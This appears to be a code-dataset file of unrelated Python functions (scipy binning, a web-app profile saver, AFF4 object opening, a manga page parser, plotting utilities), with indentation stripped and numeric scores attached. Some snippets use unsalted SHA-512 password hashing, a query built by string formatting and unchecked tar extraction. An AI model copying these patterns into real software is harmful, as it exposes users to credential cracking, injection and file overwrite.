#Get valid blocks
#if (stat == 'median') or (stat == 'mean'):
if stat in ('median', 'mean', np.max, np.min):
idx = ~np.isnan(block_stat)
else:
idx = (block_stat != 0)
idx_idx = idx.nonzero()
#Cell centers
res = [(xedges[1] - xedges[0]), (yedges[1] - yedges[0])]
out_x = xedges[:-1]+res[0]/2.0
out_y = yedges[:-1]+res[1]/2.0
out_x = out_x[idx_idx[0]]
out_y = out_y[idx_idx[1]]
out_z = block_stat[idx]
return out_x, out_y, out_z | 0.016055 |
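The underlying scipy call can be exercised on its own; the synthetic points and grid below are only for illustration.
import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
x = rng.uniform(0.0, 10.0, 1000)
y = rng.uniform(0.0, 5.0, 1000)
z = x + y + rng.normal(scale=0.1, size=1000)

# One median per grid cell, on a 20 x 10 grid covering the full extent.
block_stat, xedges, yedges, binnum = stats.binned_statistic_2d(
    x, y, z, statistic='median', bins=(20, 10), range=[[0, 10], [0, 5]])
print(block_stat.shape)   # (20, 10)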
def save_profile(self, userdata, data):
""" Save user profile modifications """
result = userdata
error = False
# Check if updating username.
if not userdata["username"] and "username" in data:
if re.match(r"^[-_|~0-9A-Z]{4,}$", data["username"], re.IGNORECASE) is None:
error = True
msg = _("Invalid username format.")
elif self.database.users.find_one({"username": data["username"]}):
error = True
msg = _("Username already taken")
else:
result = self.database.users.find_one_and_update({"email": userdata["email"]},
{"$set": {"username": data["username"]}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect email.")
else:
self.user_manager.connect_user(result["username"], result["realname"], result["email"],
result["language"])
msg = _("Profile updated.")
return result, msg, error
# Check if updating the password.
if self.app.allow_registration and len(data["passwd"]) in range(1, 6):
error = True
msg = _("Password too short.")
return result, msg, error
elif self.app.allow_registration and len(data["passwd"]) > 0 and data["passwd"] != data["passwd2"]:
error = True
msg = _("Passwords don't match !")
return result, msg, error
elif self.app.allow_registration and len(data["passwd"]) >= 6:
oldpasswd_hash = hashlib.sha512(data["oldpasswd"].encode("utf-8")).hexdigest()
passwd_hash = hashlib.sha512(data["passwd"].encode("utf-8")).hexdigest()
match = {"username": self.user_manager.session_username()}
if "password" in userdata:
match["password"] = oldpasswd_hash
result = self.database.users.find_one_and_update(match,
{"$set": {"password": passwd_hash}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect old password.")
return result, msg, error
# Check if updating language
if data["language"] != userdata["language"]:
language = data["language"] if data["language"] in self.app.available_languages else "en"
result = self.database.users.find_one_and_update({"username": self.user_manager.session_username()},
{"$set": {"language": language}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect username.")
return result, msg, error
else:
self.user_manager.set_session_language(language)
# Checks if updating name
if len(data["realname"]) > 0:
result = self.database.users.find_one_and_update({"username": self.user_manager.session_username()},
{"$set": {"realname": data["realname"]}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect username.")
return result, msg, error
else:
self.user_manager.set_session_realname(data["realname"])
else:
error = True
msg = _("Name is too short.")
return result, msg, error
msg = _("Profile updated.")
return result, msg, error | 0.004639 |
def Open(self,
urn,
aff4_type=None,
mode="r",
token=None,
local_cache=None,
age=NEWEST_TIME,
follow_symlinks=True,
transaction=None):
"""Opens the named object.
This instantiates the object from the AFF4 data store.
Note that the root aff4:/ object is a container for all other
objects. Opening it for reading will instantiate a AFF4Volume instance, even
if the row does not exist.
The mode parameter specifies, how the object should be opened. A read only
mode will raise when calling Set() on it, while a write only object will
never read from the data store. Note that its impossible to open an object
with pure write support (since we have no idea what type it should be
without reading the data base) - use Create() instead for purely write mode.
Args:
urn: The urn to open.
aff4_type: If this parameter is set, we raise an IOError if the object is
not an instance of this type. This check is important when a different
object can be stored in this location. If mode is "w", this parameter
will determine the type of the object and is mandatory.
mode: The mode to open the file with.
token: The Security Token to use for opening this item.
local_cache: A dict containing a cache as returned by GetAttributes. If
set, this bypasses the factory cache.
age: The age policy used to build this object. Should be one of
NEWEST_TIME, ALL_TIMES or a time range given as a tuple (start, end) in
microseconds since Jan 1st, 1970.
follow_symlinks: If object opened is a symlink, follow it.
transaction: A lock in case this object is opened under lock.
Returns:
An AFF4Object instance.
Raises:
IOError: If the object is not of the required type.
AttributeError: If the requested mode is incorrect.
"""
if not data_store.AFF4Enabled():
raise NotImplementedError("AFF4 data store has been disabled.")
_ValidateAFF4Type(aff4_type)
if mode not in ["w", "r", "rw"]:
raise AttributeError("Invalid mode %s" % mode)
if mode == "w":
if aff4_type is None:
raise AttributeError("Need a type to open in write only mode.")
return self.Create(
urn,
aff4_type,
mode=mode,
token=token,
age=age,
force_new_version=False,
transaction=transaction)
urn = rdfvalue.RDFURN(urn)
if token is None:
token = data_store.default_token
if "r" in mode and (local_cache is None or urn not in local_cache):
local_cache = dict(self.GetAttributes([urn], age=age))
# Read the row from the table. We know the object already exists if there is
# some data in the local_cache already for this object.
result = AFF4Object(
urn,
mode=mode,
token=token,
local_cache=local_cache,
age=age,
follow_symlinks=follow_symlinks,
object_exists=bool(local_cache.get(urn)),
transaction=transaction)
result.aff4_type = aff4_type
# Now we have a AFF4Object, turn it into the type it is currently supposed
# to be as specified by Schema.TYPE.
existing_type = result.Get(result.Schema.TYPE, default="AFF4Volume")
if existing_type:
try:
result = result.Upgrade(AFF4Object.classes[existing_type])
except KeyError:
raise InstantiationError("Unable to open %s, type %s unknown." %
(urn, existing_type))
if aff4_type is not None and not isinstance(result, aff4_type):
raise InstantiationError(
"Object %s is of type %s, but required_type is %s" %
(urn, result.__class__.__name__, aff4_type.__name__))
return result | 0.005447 |
def _get_renamed_diff(self, blueprint, command, column, schema):
"""
Get a new column instance with the new column name.
:param blueprint: The blueprint
:type blueprint: Blueprint
:param command: The command
:type command: Fluent
:param column: The column
:type column: orator.dbal.Column
:param schema: The schema
:type schema: orator.dbal.SchemaManager
:rtype: orator.dbal.TableDiff
"""
table_diff = self._get_table_diff(blueprint, schema)
return self._set_renamed_columns(table_diff, command, column) | 0.003221 |
def target_base(self):
"""
:API: public
:returns: the source root path for this target.
"""
source_root = self._sources_field.source_root
if not source_root:
raise TargetDefinitionException(self, 'Not under any configured source root.')
return source_root.path | 0.010169 |
async def resetTriggerToken(self, *args, **kwargs):
"""
Reset a trigger token
Reset the token for triggering a given hook. This invalidates token that
may have been issued via getTriggerToken with a new token.
This method gives output: ``v1/trigger-token-response.json#``
This method is ``stable``
"""
return await self._makeApiCall(self.funcinfo["resetTriggerToken"], *args, **kwargs) | 0.00883 |
def get_clan_war(self, tag: crtag, timeout: int=None):
"""Get inforamtion about a clan's current clan war
Parameters
----------
tag: str
A valid tournament tag. Minimum length: 3
Valid characters: 0289PYLQGRJCUV
timeout: Optional[int] = None
Custom timeout that overwrites Client.timeout
"""
url = self.api.CLAN + '/' + tag + '/currentwar'
return self._get_model(url, timeout=timeout) | 0.008247 |
def address(self):
'''
Return the address of this "object", minus the scheme, hostname
and port of the bridge
'''
return self.API.replace(
'http://{}:{}'.format(
self._bridge.hostname,
self._bridge.port
), ''
) | 0.006369 |
def spec_var(model, ph):
"""Compute variance of ``p`` from Fourier coefficients ``ph``.
Parameters
----------
model : pyqg.Model instance
The model object from which `ph` originates
ph : complex array
The field on which to compute the variance
Returns
-------
var_dens : float
The variance of `ph`
"""
var_dens = 2. * np.abs(ph)**2 / model.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] /= 2
var_dens[...,-1] /= 2
return var_dens.sum(axis=(-1,-2)) | 0.007005 |
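The normalization can be checked against Parseval's theorem with a plain numpy rfft2, independent of pyqg; M is taken here to be nx*ny, which is an assumption about what the model attribute holds.
import numpy as np

rng = np.random.default_rng(0)
ny, nx = 64, 64
p = rng.standard_normal((ny, nx))
p -= p.mean()                      # remove the mean mode

ph = np.fft.rfft2(p)
M = nx * ny                        # assumed meaning of model.M
var_dens = 2.0 * np.abs(ph)**2 / M**2
var_dens[..., 0] /= 2              # undo the doubling on the symmetric columns
var_dens[..., -1] /= 2
print(np.allclose(var_dens.sum(), p.var()))   # True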
def safe_import(self, name):
"""Helper utility for reimporting previously imported modules while inside the env"""
module = None
if name not in self._modules:
self._modules[name] = importlib.import_module(name)
module = self._modules[name]
if not module:
dist = next(iter(
dist for dist in self.base_working_set if dist.project_name == name
), None)
if dist:
dist.activate()
module = importlib.import_module(name)
if name in sys.modules:
try:
six.moves.reload_module(module)
six.moves.reload_module(sys.modules[name])
except TypeError:
del sys.modules[name]
sys.modules[name] = self._modules[name]
return module | 0.004723 |
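The reload pattern this relies on can be shown with the standard library alone (importlib.reload is the modern equivalent of six.moves.reload_module; json is just a convenient stand-in module).
import importlib
import sys

mod = importlib.import_module('json')        # first (possibly cached) import
mod = importlib.reload(sys.modules['json'])  # force re-execution of the module
print(mod.dumps({'reloaded': True}))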
def _coeff4(N, a0, a1, a2, a3):
"""a common internal function to some window functions with 4 coeffs
    For the Blackman-Harris window, for instance, the results are identical to Octave if N is odd,
    but not for even values... If n = 0, whatever N is, w(0) must equal a0 - a1 + a2 - a3, which
    is the case here, but not in Octave..."""
if N == 1:
return ones(1)
n = arange(0, N)
N1 = N - 1.
    w = a0 - a1*cos(2.*pi*n / N1) + a2*cos(4.*pi*n / N1) - a3*cos(6.*pi*n / N1)
return w | 0.007843 |
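A self-contained version of the same four-term cosine sum, checked at n = 0; the coefficient set used is one commonly quoted 4-term Blackman-Harris set, not necessarily the one the surrounding library uses.
import numpy as np

def coeff4_window(N, a0, a1, a2, a3):
    # Same four-term cosine sum as _coeff4, written against numpy directly.
    if N == 1:
        return np.ones(1)
    n = np.arange(N)
    N1 = N - 1.0
    return (a0 - a1*np.cos(2.*np.pi*n/N1) + a2*np.cos(4.*np.pi*n/N1)
               - a3*np.cos(6.*np.pi*n/N1))

w = coeff4_window(64, 0.35875, 0.48829, 0.14128, 0.01168)
print(np.isclose(w[0], 0.35875 - 0.48829 + 0.14128 - 0.01168))   # True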
def _external2internal_func(bounds):
"""
Make a function which converts between external (constrained) and
internal (unconstrained) parameters.
"""
ls = [_external2internal_lambda(b) for b in bounds]
def convert_e2i(xe):
xi = empty_like(xe)
xi[:] = [l(p) for l, p in zip(ls, xe)]
return xi
return convert_e2i | 0.005525 |
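_external2internal_lambda is not shown here; one common choice for a two-sided bound (lo, hi) is the MINUIT-style sine parametrisation, sketched below as an assumption rather than the library's actual transform.
import numpy as np

def external2internal(x, lo, hi):
    # Map a bounded external value into an unbounded internal one.
    return np.arcsin(2.0*(x - lo)/(hi - lo) - 1.0)

def internal2external(x, lo, hi):
    # Inverse map back into [lo, hi].
    return lo + (np.sin(x) + 1.0)*(hi - lo)/2.0

xi = external2internal(3.7, 0.0, 10.0)
print(np.isclose(internal2external(xi, 0.0, 10.0), 3.7))   # round-trips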
def is_chief(task: backend.Task, run_name: str):
"""Returns True if task is chief task in the corresponding run"""
global run_task_dict
if run_name not in run_task_dict:
return True
task_list = run_task_dict[run_name]
assert task in task_list, f"Task {task.name} doesn't belong to run {run_name}"
return task_list[0] == task | 0.023529 |
def durables(self):
"""
Dictionary of all keys and their values in Zookeeper.
"""
results = dict()
for child in self.connection.retry(self.connection.get_children, self.keyspace):
value, _ = self.connection.retry(
self.connection.get,
self.__path_of(child),
watch=self.__increment_last_updated
)
results[child] = self.encoding.decode(value)
return results | 0.006135 |
def update_stored_win32tz_map():
"""Downloads the cldr win32 timezone map and stores it in win32tz_map.py."""
windows_zones_xml = download_cldr_win32tz_map_xml()
source_hash = hashlib.md5(windows_zones_xml).hexdigest()
if hasattr(windows_zones_xml, "decode"):
windows_zones_xml = windows_zones_xml.decode("utf-8")
map_zones = create_win32tz_map(windows_zones_xml)
map_dir = os.path.dirname(os.path.abspath(__file__))
map_filename = os.path.join(map_dir, "win32tz_map.py")
if os.path.exists(map_filename):
reload(win32tz_map)
current_hash = getattr(win32tz_map, "source_hash", None)
if current_hash == source_hash:
return False
map_file = open(map_filename, "w")
comment = "Map between Windows and Olson timezones taken from %s" % (
_CLDR_WINZONES_URL,)
comment2 = "Generated automatically from datetime_tz.py"
map_file.write("'''%s\n" % comment)
map_file.write("%s'''\n" % comment2)
map_file.write("source_hash = '%s' # md5 sum of xml source data\n" % (
source_hash))
map_file.write("win32timezones = {\n")
for win32_name, territory, olson_name, comment in map_zones:
if territory == '001':
map_file.write(" %r: %r, # %s\n" % (
str(win32_name), str(olson_name), comment or ""))
else:
map_file.write(" %r: %r, # %s\n" % (
(str(win32_name), str(territory)), str(olson_name), comment or ""))
map_file.write("}\n")
map_file.close()
return True | 0.015753 |
def generate_lines_for_vocab(tmp_dir, sources, file_byte_budget=1e6):
"""Generate lines for vocabulary generation."""
tf.logging.info("Generating vocab from: %s", str(sources))
for source in sources:
url = source[0]
filename = os.path.basename(url)
compressed_file = maybe_download(tmp_dir, filename, url)
for lang_file in source[1]:
tf.logging.info("Reading file: %s" % lang_file)
filepath = os.path.join(tmp_dir, lang_file)
# Extract from tar if needed.
if not tf.gfile.Exists(filepath):
read_type = "r:gz" if filename.endswith("tgz") else "r"
with tarfile.open(compressed_file, read_type) as corpus_tar:
corpus_tar.extractall(tmp_dir)
# For some datasets a second extraction is necessary.
if lang_file.endswith(".gz"):
new_filepath = os.path.join(tmp_dir, lang_file[:-3])
if tf.gfile.Exists(new_filepath):
tf.logging.info(
"Subdirectory %s already exists, skipping unpacking" % filepath)
else:
tf.logging.info("Unpacking subdirectory %s" % filepath)
gunzip_file(filepath, new_filepath)
filepath = new_filepath
with tf.gfile.GFile(filepath, mode="r") as source_file:
file_byte_budget_ = file_byte_budget
counter = 0
countermax = int(source_file.size() / file_byte_budget_ / 2)
for line in source_file:
if counter < countermax:
counter += 1
else:
if file_byte_budget_ <= 0:
break
line = line.strip()
file_byte_budget_ -= len(line)
counter = 0
yield line | 0.01083 |
def get_memberships_for_org(self, account_num, verbose=False):
"""
Retrieve all memberships associated with an organization,
ordered by expiration date.
"""
if not self.client.session_id:
self.client.request_session()
query = "SELECT Objects() FROM Membership " \
"WHERE Owner = '%s' ORDER BY ExpirationDate" % account_num
membership_list = self.get_long_query(query, verbose=verbose)
return membership_list or [] | 0.003945 |
def fmt_sz(intval):
""" Format a byte sized value.
"""
try:
return fmt.human_size(intval)
except (ValueError, TypeError):
return "N/A".rjust(len(fmt.human_size(0))) | 0.005102 |
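fmt.human_size comes from the surrounding project; a minimal stand-in with the same intent (scaling by powers of 1024) is sketched here, with no claim that it matches the real formatting.
def human_size(num_bytes):
    # Illustrative only: scale by powers of 1024 and keep one decimal.
    size = float(num_bytes)
    for unit in ('B', 'KiB', 'MiB', 'GiB', 'TiB'):
        if abs(size) < 1024.0 or unit == 'TiB':
            return '%.1f %s' % (size, unit)
        size /= 1024.0

print(human_size(3_500_000))   # 3.3 MiB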
def hash_id(self):
"""获取作者的内部hash id(用不到就忽视吧~)
:return: 用户hash id
:rtype: str
"""
div = self.soup.find('div', class_='zm-profile-header-op-btns')
if div is not None:
return div.button['data-id']
else:
ga = self.soup.find('script', attrs={'data-name': 'ga_vars'})
return json.loads(ga.text)['user_hash'] | 0.005063 |
def guess_initc(ts, f, rts=[]):
"""
ts - An AstonSeries that's being fitted with peaks
f - The functional form of the peaks (e.g. gaussian)
rts - peak maxima to fit; each number corresponds to one peak
"""
def find_side(y, loc=None):
if loc is None:
loc = y.argmax()
ddy = np.diff(np.diff(y))
lft_loc, rgt_loc = loc - 2, loc + 1
while rgt_loc >= 0 and rgt_loc < len(ddy):
if ddy[rgt_loc] < ddy[rgt_loc - 1]:
break
rgt_loc += 1
while lft_loc >= 0 and lft_loc < len(ddy):
if ddy[lft_loc] < ddy[lft_loc + 1]:
break
lft_loc -= 1
return lft_loc + 1, rgt_loc + 1
# weight_mom = lambda m, a, w: \
# np.sum(w * (a - np.sum(w * a) / np.sum(w)) ** m) / np.sum(w)
# sig = np.sqrt(weight_mom(2, ts.index, ts.values)) # sigma
# peak_params['s'] = weight_mom(3, ts.index, ts.values) / sig ** 3
# peak_params['e'] = weight_mom(4, ts.index, ts.values) / sig ** 4 - 3
# TODO: better method of calculation of these?
all_params = []
for rt in rts:
peak_params = {'x': rt} # ts.index[ts.values.argmax()]
top_idx = np.abs(ts.index - rt).argmin()
side_idx = find_side(ts.values, top_idx)
peak_params['h'] = ts.values[top_idx]
# - min(ts.y[side_idx[0]], ts.y[side_idx[1]])
peak_params['w'] = ts.index[side_idx[1]] - ts.index[side_idx[0]]
peak_params['s'] = 1.1
peak_params['e'] = 1.
peak_params['a'] = 1.
all_params.append(peak_params)
return all_params | 0.000619 |
def remove_instance(self, instance):
"""Request to cleanly remove the given instance.
If instance is external also shutdown it cleanly
:param instance: instance to remove
:type instance: object
:return: None
"""
# External instances need to be close before (process + queues)
if instance.is_external:
logger.info("Request external process to stop for %s", instance.name)
instance.stop_process()
logger.info("External process stopped.")
instance.clear_queues(self.daemon.sync_manager)
# Then do not listen anymore about it
self.instances.remove(instance) | 0.004412 |
def list(self, link_type, product, identifierType=None):
"""
Retrieve list of linked products
:param link_type: type of link, one of 'cross_sell', 'up_sell',
'related' or 'grouped'
:param product: ID or SKU of product
:param identifierType: Defines whether the product or SKU value is
passed in the "product" parameter.
:return: `list` of `dict`
"""
return self.call('catalog_product_link.list',
[link_type, product, identifierType]) | 0.003503 |
def parse_sidebar(self, manga_page):
"""Parses the DOM and returns manga attributes in the sidebar.
:type manga_page: :class:`bs4.BeautifulSoup`
:param manga_page: MAL manga page's DOM
:rtype: dict
:return: manga attributes
:raises: :class:`.InvalidMangaError`, :class:`.MalformedMangaPageError`
"""
# if MAL says the series doesn't exist, raise an InvalidMangaError.
error_tag = manga_page.find(u'div', {'class': 'badresult'})
if error_tag:
raise InvalidMangaError(self.id)
try:
title_tag = manga_page.find(u'div', {'id': 'contentWrapper'}).find(u'h1')
if not title_tag.find(u'div'):
# otherwise, raise a MalformedMangaPageError.
raise MalformedMangaPageError(self.id, manga_page, message="Could not find title div")
except:
if not self.session.suppress_parse_exceptions:
raise
# otherwise, begin parsing.
manga_info = super(Manga, self).parse_sidebar(manga_page)
info_panel_first = manga_page.find(u'div', {'id': 'content'}).find(u'table').find(u'td')
try:
volumes_tag = info_panel_first.find(text=u'Volumes:').parent.parent
utilities.extract_tags(volumes_tag.find_all(u'span', {'class': 'dark_text'}))
manga_info[u'volumes'] = int(volumes_tag.text.strip()) if volumes_tag.text.strip() != 'Unknown' else None
except:
if not self.session.suppress_parse_exceptions:
raise
try:
chapters_tag = info_panel_first.find(text=u'Chapters:').parent.parent
utilities.extract_tags(chapters_tag.find_all(u'span', {'class': 'dark_text'}))
manga_info[u'chapters'] = int(chapters_tag.text.strip()) if chapters_tag.text.strip() != 'Unknown' else None
except:
if not self.session.suppress_parse_exceptions:
raise
try:
published_tag = info_panel_first.find(text=u'Published:').parent.parent
utilities.extract_tags(published_tag.find_all(u'span', {'class': 'dark_text'}))
published_parts = published_tag.text.strip().split(u' to ')
if len(published_parts) == 1:
# this published once.
try:
published_date = utilities.parse_profile_date(published_parts[0])
except ValueError:
raise MalformedMangaPageError(self.id, published_parts[0], message="Could not parse single publish date")
manga_info[u'published'] = (published_date,)
else:
# two publishing dates.
try:
publish_start = utilities.parse_profile_date(published_parts[0])
except ValueError:
raise MalformedMangaPageError(self.id, published_parts[0], message="Could not parse first of two publish dates")
                if published_parts[1] == u'?':
# this is still publishing.
publish_end = None
else:
try:
publish_end = utilities.parse_profile_date(published_parts[1])
except ValueError:
raise MalformedMangaPageError(self.id, published_parts[1], message="Could not parse second of two publish dates")
manga_info[u'published'] = (publish_start, publish_end)
except:
if not self.session.suppress_parse_exceptions:
raise
try:
authors_tag = info_panel_first.find(text=u'Authors:').parent.parent
utilities.extract_tags(authors_tag.find_all(u'span', {'class': 'dark_text'}))
manga_info[u'authors'] = {}
for author_link in authors_tag.find_all('a'):
link_parts = author_link.get('href').split('/')
# of the form /people/1867/Naoki_Urasawa
person = self.session.person(int(link_parts[2])).set({'name': author_link.text})
role = author_link.nextSibling.replace(' (', '').replace(')', '')
manga_info[u'authors'][person] = role
except:
if not self.session.suppress_parse_exceptions:
raise
try:
serialization_tag = info_panel_first.find(text=u'Serialization:').parent.parent
publication_link = serialization_tag.find('a')
manga_info[u'serialization'] = None
if publication_link:
link_parts = publication_link.get('href').split('mid=')
# of the form /manga.php?mid=1
manga_info[u'serialization'] = self.session.publication(int(link_parts[1])).set({'name': publication_link.text})
except:
if not self.session.suppress_parse_exceptions:
raise
return manga_info | 0.012835 |
def _set_static_network(self, v, load=False):
"""
Setter method for static_network, mapped from YANG variable /rbridge_id/router/router_bgp/address_family/ipv4/ipv4_unicast/default_vrf/static_network (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_static_network is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_static_network() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("static_network_address",static_network.static_network, yang_name="static-network", rest_name="static-network", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='static-network-address', extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}), is_container='list', yang_name="static-network", rest_name="static-network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """static_network must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("static_network_address",static_network.static_network, yang_name="static-network", rest_name="static-network", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='static-network-address', extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}), is_container='list', yang_name="static-network", rest_name="static-network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='list', is_config=True)""",
})
self.__static_network = t
if hasattr(self, '_set'):
self._set() | 0.003532 |
def update_pr_main():
"""Main method"""
parser = argparse.ArgumentParser(
description='Build package.',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--pr-number', '-p',
dest='pr_number', type=int, required=True,
help='PR number')
parser.add_argument('--repo', '-r',
dest='repo_id', default="Azure/azure-sdk-for-python",
help='Repo id. [default: %(default)s]')
parser.add_argument("-v", "--verbose",
dest="verbose", action="store_true",
help="Verbosity in INFO mode")
parser.add_argument("--debug",
dest="debug", action="store_true",
help="Verbosity in DEBUG mode")
args = parser.parse_args()
main_logger = logging.getLogger()
if args.verbose or args.debug:
logging.basicConfig()
main_logger.setLevel(logging.DEBUG if args.debug else logging.INFO)
update_pr(
os.environ.get("GH_TOKEN", None),
args.repo_id,
int(args.pr_number),
) | 0.000873 |
def hierarchy(intervals_hier, labels_hier, levels=None, ax=None, **kwargs):
'''Plot a hierarchical segmentation
Parameters
----------
intervals_hier : list of np.ndarray
A list of segmentation intervals. Each element should be
an n-by-2 array of segment intervals, in the format returned by
:func:`mir_eval.io.load_intervals` or
:func:`mir_eval.io.load_labeled_intervals`.
Segmentations should be ordered by increasing specificity.
labels_hier : list of list-like
A list of segmentation labels. Each element should
be a list of labels for the corresponding element in
`intervals_hier`.
levels : list of string
Each element ``levels[i]`` is a label for the ```i`` th segmentation.
This is used in the legend to denote the levels in a segment hierarchy.
kwargs
Additional keyword arguments to `labeled_intervals`.
Returns
-------
ax : matplotlib.pyplot.axes._subplots.AxesSubplot
A handle to the (possibly constructed) plot axes
'''
# This will break if a segment label exists in multiple levels
if levels is None:
levels = list(range(len(intervals_hier)))
# Get the axes handle
ax, _ = __get_axes(ax=ax)
# Count the pre-existing patches
n_patches = len(ax.patches)
for ints, labs, key in zip(intervals_hier[::-1],
labels_hier[::-1],
levels[::-1]):
labeled_intervals(ints, labs, label=key, ax=ax, **kwargs)
# Reverse the patch ordering for anything we've added.
# This way, intervals are listed in the legend from top to bottom
ax.patches[n_patches:] = ax.patches[n_patches:][::-1]
return ax | 0.000567 |
def run_somaticsniper_full(job, tumor_bam, normal_bam, univ_options, somaticsniper_options):
"""
Run SomaticSniper on the DNA bams.
:param dict tumor_bam: Dict of bam and bai for tumor DNA-Seq
:param dict normal_bam: Dict of bam and bai for normal DNA-Seq
:param dict univ_options: Dict of universal options used by almost all tools
:param dict somaticsniper_options: Options specific to SomaticSniper
:return: fsID to the genome-level vcf
:rtype: toil.fileStore.FileID
"""
work_dir = os.getcwd()
input_files = {
'tumor.bam': tumor_bam['tumor_dna_fix_pg_sorted.bam'],
'tumor.bam.bai': tumor_bam['tumor_dna_fix_pg_sorted.bam.bai'],
'normal.bam': normal_bam['normal_dna_fix_pg_sorted.bam'],
'normal.bam.bai': normal_bam['normal_dna_fix_pg_sorted.bam.bai'],
'genome.fa.tar.gz': somaticsniper_options['genome_fasta'],
'genome.fa.fai.tar.gz': somaticsniper_options['genome_fai']}
input_files = get_files_from_filestore(job, input_files, work_dir, docker=False)
for key in ('genome.fa', 'genome.fa.fai'):
input_files[key] = untargz(input_files[key + '.tar.gz'], work_dir)
input_files = {key: docker_path(path) for key, path in input_files.items()}
output_file = os.path.join(work_dir, 'somatic-sniper_full.vcf')
parameters = ['-f', input_files['genome.fa'],
'-F', 'vcf',
'-G',
'-L',
'-q', '1',
'-Q', '15',
input_files['tumor.bam'],
input_files['normal.bam'],
docker_path(output_file)]
docker_call(tool='somaticsniper', tool_parameters=parameters, work_dir=work_dir,
dockerhub=univ_options['dockerhub'], tool_version=somaticsniper_options['version'])
outfile = job.fileStore.writeGlobalFile(output_file)
job.fileStore.logToMaster('Ran SomaticSniper on %s successfully' % univ_options['patient'])
return outfile | 0.003497 |
def post(self, url, data, headers=None):
"""
Perform an HTTP POST request for a given url.
Returns the response object.
"""
return self._request('POST', url, data, headers=headers) | 0.009091 |
def line_spacing(self):
"""
|float| or |Length| value specifying the space between baselines in
successive lines of the paragraph. A value of |None| indicates line
spacing is inherited from the style hierarchy. A float value, e.g.
``2.0`` or ``1.75``, indicates spacing is applied in multiples of
line heights. A |Length| value such as ``Pt(12)`` indicates spacing
is a fixed height. The |Pt| value class is a convenient way to apply
line spacing in units of points. Assigning |None| resets line spacing
to inherit from the style hierarchy.
"""
pPr = self._element.pPr
if pPr is None:
return None
return self._line_spacing(pPr.spacing_line, pPr.spacing_lineRule) | 0.002571 |
def random_stochastic_matrix(n, k=None, sparse=False, format='csr',
random_state=None):
"""
Return a randomly sampled n x n stochastic matrix with k nonzero
entries for each row.
Parameters
----------
n : scalar(int)
Number of states.
k : scalar(int), optional(default=None)
Number of nonzero entries in each row of the matrix. Set to n if
not specified.
sparse : bool, optional(default=False)
Whether to generate the matrix in sparse matrix form.
format : str, optional(default='csr')
Sparse matrix format, str in {'bsr', 'csr', 'csc', 'coo', 'lil',
'dia', 'dok'}. Relevant only when sparse=True.
random_state : int or np.random.RandomState, optional
Random seed (integer) or np.random.RandomState instance to set
the initial state of the random number generator for
reproducibility. If None, a randomly initialized RandomState is
used.
Returns
-------
P : numpy ndarray or scipy sparse matrix (float, ndim=2)
Stochastic matrix.
See also
--------
random_markov_chain : Return a random MarkovChain instance.
"""
P = _random_stochastic_matrix(m=n, n=n, k=k, sparse=sparse, format=format,
random_state=random_state)
return P | 0.000737 |
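A stochastic matrix can also be produced directly with numpy by normalizing rows of positive draws; this is only a conceptual sketch, not the library's sampling scheme (it ignores k and sparse output).
import numpy as np

def naive_random_stochastic_matrix(n, random_state=None):
    # Draw positive entries, then normalize each row to sum to one.
    rng = np.random.default_rng(random_state)
    P = rng.random((n, n))
    return P / P.sum(axis=1, keepdims=True)

P = naive_random_stochastic_matrix(4, random_state=0)
print(np.allclose(P.sum(axis=1), 1.0))   # every row is a distribution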
def _plot(self, xticks=[], yticks=[], minor_xticks=[], minor_yticks=[],
xlabel='Longitude', ylabel='Latitude', ax=None, ax2=None,
colorbar=None, cb_orientation=None, cb_label=None, grid=False,
axes_labelsize=None, tick_labelsize=None, **kwargs):
"""Plot the raw data using a simply cylindrical projection."""
if ax is None:
if colorbar is True:
if cb_orientation == 'horizontal':
scale = 0.67
else:
scale = 0.5
else:
scale = 0.55
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, axes = _plt.subplots(1, 1, figsize=figsize)
else:
axes = ax
deg = '$^{\circ}$'
xticklabels = [str(int(y)) + deg for y in xticks]
yticklabels = [str(int(y)) + deg for y in yticks]
cim = axes.imshow(self.data, origin='upper',
extent=(0., 360., -90., 90.), **kwargs)
axes.set(xticks=xticks, yticks=yticks)
axes.set_xlabel(xlabel, fontsize=axes_labelsize)
axes.set_ylabel(ylabel, fontsize=axes_labelsize)
axes.set_xticklabels(xticklabels, fontsize=tick_labelsize)
axes.set_yticklabels(yticklabels, fontsize=tick_labelsize)
